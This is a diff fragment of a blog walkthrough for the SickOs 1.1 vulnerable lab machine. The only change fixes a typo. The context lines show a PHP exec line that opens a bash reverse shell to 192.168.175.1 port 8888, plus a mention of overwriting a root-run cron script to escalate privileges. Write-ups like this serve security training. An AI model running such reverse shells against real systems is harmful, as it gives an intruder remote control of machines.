mmmds/jekyll-now/_posts/2017-03-08-SickOs-11-Walkthrough.md

 	exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.175.1/8888 0>&1'");
 	?>

 After I got access to shell and started investigation what this machines does.
 I found that there is a cron running python script as root every minute.
-Fortunatelly I had permission to overwrite this file.
+Fortunately I had permission to overwrite this file.

 ![]({{site.baseurl}}/images/sickos5.png)